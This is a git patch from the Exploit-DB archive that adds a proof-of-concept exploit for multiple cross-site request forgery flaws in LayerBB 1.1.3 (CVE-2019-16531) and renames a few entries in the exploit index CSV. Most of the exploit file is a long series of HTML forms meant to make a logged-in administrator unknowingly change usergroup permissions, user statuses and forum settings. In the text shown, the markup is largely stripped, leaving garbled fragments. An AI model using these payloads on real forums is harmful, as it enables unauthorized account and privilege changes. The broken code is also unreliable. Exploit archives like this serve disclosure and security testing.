From 7ceaed0205318cc551d06e9044f96e5a6ae0925d Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 21 Sep 2019 05:04:22 +0000 Subject: [PATCH] DB: 2019-09-21 1 changes to exploits/shellcodes Concrete5 FlashUploader - Arbitrary '.SWF' File Upload Concrete5 CMS FlashUploader - Arbitrary '.SWF' File Upload Concrete5 < 8.3.0 - Username / Comments Enumeration Concrete5 CMS < 8.3.0 - Username / Comments Enumeration LayerBB < 1.1.4 - Cross-Site Request Forgery --- exploits/php/webapps/47403.html | 532 ++++++++++++++++++++++++++++++++ files_exploits.csv | 5 +- 2 files changed, 535 insertions(+), 2 deletions(-) create mode 100644 exploits/php/webapps/47403.html diff --git a/exploits/php/webapps/47403.html b/exploits/php/webapps/47403.html new file mode 100644 index 000000000..53d7e3eaf --- /dev/null +++ b/exploits/php/webapps/47403.html @@ -0,0 +1,532 @@ +# Exploit Title: LayerBB 1.1.3 - Multiple CSRF +# Date: 4/7/2019 +# Author: 0xB9 +# Twitter: @0xB9Sec +# Contact: 0xB9[at]pm.me +# Software Link: https://forum.layerbb.com/downloads.php?view=file&id=30 +# Version: 1.1.3 +# Tested on: Ubuntu 18.04 +# CVE: CVE-2019-16531 + + +1. Description: +LayerBB is a free open-source forum software, multiple CSRF vulnerabilities were found such as editing user profiles and forums. + + +2. Proof of Concepts: + + +
+ + + + + + + + +
+ view_forum
create_thread
reply_thread
access_moderation
access_administration
+
+ This Usergroup is staff. +
+ +
+ + + +
+ + + + + + + + +
+ Do Not Change
+ Active
+ Disabled
+
+
+

+ +
+ + + +
+ + + + +
+
+ Guest
User
Banned
Moderator
Administrator
+
+ +
+ + + +
+ + + + +
+ +
+
+ +
+
+ Guest
User
Banned
Moderator
Administrator
+ Each Line is a new label. HTML enabled. +
+ +
+ + + +
+
+
+
+
+ + + + + + +
+
+
+
+
+
+
+
+
+

+ + HTML tags will be converted into ascii codes. Hyperlinks are not supported! + +
+ + HTML tags will be converted into ascii codes. + +
+ + + + + Use reCaptcha
+
+ + + +
+ + + +

+

+
+
+
+ + + + + + + + + + + + + + + + + + + + + + +
CategoryOrderControls
+ test cat
+ test cat +
+
+ + + +
+
+ +
+ First Category
+ First category on this forum! +
+
+ + + +
+
+ +
+

Use ENTER to save catagory order

+ + + + + + + + + + + + + + + + + + +
NodeOrderControls
+ First Node
+ The first node on this forum
+ Sub-Forums: +
+
+ + + +
+
+ +
+

Use ENTER to save catagory order

+ + + +
+ + + +
+ + +
+ + + +
+ + +
+ + +
+
+ + +
+
+ + +
+
+ + +
+ +
+ + + +
+ + + + +
+ +
+ User
Banned
Moderator
Administrator
+
+ +
+ + + +
+ + + + +
+ +
+
+ +
+ +
+ User
Banned
Moderator
Administrator
+ Each Line is a new label. HTML enabled. +
+ +
+ + + +
+ + + + +
+ view_forum
create_thread
reply_thread
access_moderation
access_administration
+
+ This Usergroup is staff. +
+ +
+ + + +
+ +
+ + +
+ +
+ + + +
+ +
+ + +
+
+ + +
+
+ + +
+
+ + +
+
+ + +
+ +
+ + + +
+
+ +
+ +
+ + + +
+ +
+
+ + +
+ +
+ +
+ +
+
+
+ + + + + + + Add an answer field +
+
+
+
+ + + +
+ +

+ +

+
+ + + +
+ +

+ +

+
+ + + +
+ + +
+ +
+ + + +
+ + + + + + + + +
+ + +
+ + + In the format of: YYYY-MM-DD +
+ +
+
+
Additional Profile Fields
+
+
+
+ +
+ + + +
+ + +

+ +
+ + + +
+ + + + +

+ +
+ + + +
+ + +

+ +
+ + + +
+ + + + +

+ +
+ + + +
+ + + + + + + + +
+ LayerBB Captcha
+

+ + By clicking "Register", you agree to abide by the forum rules located here. +
+ + + + +3. Solution: +Update to 1.1.4 \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 614976ce9..b16c4881d 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -37150,7 +37150,7 @@ id,file,description,date,author,type,platform,port 37223,exploits/asp/webapps/37223.txt,"Acuity CMS 2.6.2 - '/admin/file_manager/browse.asp?path' Traversal Arbitrary File Access",2012-05-21,"Aung Khant",webapps,asp, 37224,exploits/php/webapps/37224.txt,"Yandex.Server 2010 9.0 - 'text' Cross-Site Scripting",2012-05-21,MustLive,webapps,php, 37225,exploits/php/webapps/37225.pl,"Concrete CMS < 5.5.21 - Multiple Vulnerabilities",2012-05-20,AkaStep,webapps,php, -37226,exploits/php/webapps/37226.txt,"Concrete5 FlashUploader - Arbitrary '.SWF' File Upload",2012-05-20,AkaStep,webapps,php, +37226,exploits/php/webapps/37226.txt,"Concrete5 CMS FlashUploader - Arbitrary '.SWF' File Upload",2012-05-20,AkaStep,webapps,php, 37350,exploits/php/webapps/37350.txt,"AdaptCMS 2.0.2 TinyURL Plugin - 'index.php?id' SQL Injection",2012-06-03,KedAns-Dz,webapps,php, 37351,exploits/php/webapps/37351.txt,"AdaptCMS 2.0.2 TinyURL Plugin - 'admin.php' Multiple SQL Injections",2012-06-03,KedAns-Dz,webapps,php, 37352,exploits/php/webapps/37352.txt,"Ignite Solutions CMS - 'car-details.php' SQL Injection",2012-06-03,Am!r,webapps,php, @@ -40324,7 +40324,7 @@ id,file,description,date,author,type,platform,port 44276,exploits/multiple/webapps/44276.txt,"Prisma Industriale Checkweigher PrismaWEB 1.21 - Hard-Coded Credentials",2018-03-12,LiquidWorm,webapps,multiple, 44191,exploits/php/webapps/44191.txt,"School Management Script 3.0.4 - Authentication Bypass",2018-02-27,"Samiran Santra",webapps,php, 44192,exploits/php/webapps/44192.txt,"CMS Made Simple 2.1.6 - Remote Code Execution",2018-02-27,"Keerati T.",webapps,php, -44194,exploits/php/webapps/44194.py,"Concrete5 < 8.3.0 - Username / Comments Enumeration",2018-02-27,"Chapman Schleiss",webapps,php, +44194,exploits/php/webapps/44194.py,"Concrete5 CMS < 8.3.0 - Username / Comments Enumeration",2018-02-27,"Chapman Schleiss",webapps,php, 44216,exploits/perl/webapps/44216.txt,"Routers2 2.24 - Cross-Site Scripting",2018-02-28,"Lorenzo Di Fuccia",webapps,perl, 44219,exploits/hardware/webapps/44219.txt,"D-Link DIR-600M Wireless - Cross-Site Scripting",2018-03-02,"Prasenjit Kanti Paul",webapps,hardware, 44220,exploits/multiple/webapps/44220.txt,"antMan < 0.9.1a - Authentication Bypass",2018-03-02,"Joshua Bowser",webapps,multiple, @@ -41745,3 +41745,4 @@ id,file,description,date,author,type,platform,port 47399,exploits/hardware/webapps/47399.txt,"Western Digital My Book World II NAS 1.02.12 - Authentication Bypass / Command Execution",2019-09-19,"Noman Riffat",webapps,hardware, 47401,exploits/php/webapps/47401.txt,"DIGIT CENTRIS 4 ERP - 'datum1' SQL Injection",2019-09-19,n1x_,webapps,php, 47402,exploits/php/webapps/47402.txt,"GOautodial 4.0 - 'CreateEvent' Persistent Cross-Site Scripting",2019-09-19,cakes,webapps,php, +47403,exploits/php/webapps/47403.html,"LayerBB < 1.1.4 - Cross-Site Request Forgery",2019-09-20,0xB9,webapps,php,